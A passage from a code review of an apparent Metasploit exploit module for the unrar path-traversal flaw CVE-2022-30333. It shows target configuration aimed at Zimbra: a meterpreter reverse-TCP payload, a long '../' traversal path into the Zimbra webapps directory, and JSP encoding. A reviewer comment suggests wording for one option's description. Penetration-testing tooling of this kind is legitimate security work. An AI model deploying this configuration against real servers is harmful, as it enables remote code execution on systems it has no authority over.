modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb

```diff
@@ -0,0 +1,245 @@
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
+          # the template is ~1624 bytes long (with worst possible RNG). We could
+          # create a larger payload if we desire
+          'Space' => (4096 / 2) - 1700
+        },
+        'Targets' => [
+          [
+            'Zimbra Collaboration Suite',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+
+                'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
+                'TARGET_FILENAME' => nil,
+                'TARGET_EXTENSION' => 'jsp',
+                'DisablePayloadHandler' => false,
+                'RPORT' => 443,
+                'SSL' => true,
+                'EncodeAsJsp' => true
+              }
+            },
+          ],
+          [
+            'Generic RAR file',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'TARGET_PATH' => nil,
+                'TARGET_FILENAME' => nil,
+                'TARGET_EXTENSION' => nil,
+                'AllowNoCleanup' => true,
+                'EncodeAsJsp' => false
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-06-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+
+        # Separating the path, filename, and extension allows us to randomize the filename
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").', nil]),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory (default: random).', nil]),
+        OptString.new('TARGET_EXTENSION', [ false, 'The extension to add to the filename (default: no extension).', nil]),
+        OptString.new('EncodeAsJsp', [ false, 'Encode the payload as a .jsp file?', false])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        # Took this from multi/handler
+        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait while checking for the payload.', 5 ])
```

Comment:
Maybe this is more specific:
```suggestion
        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
```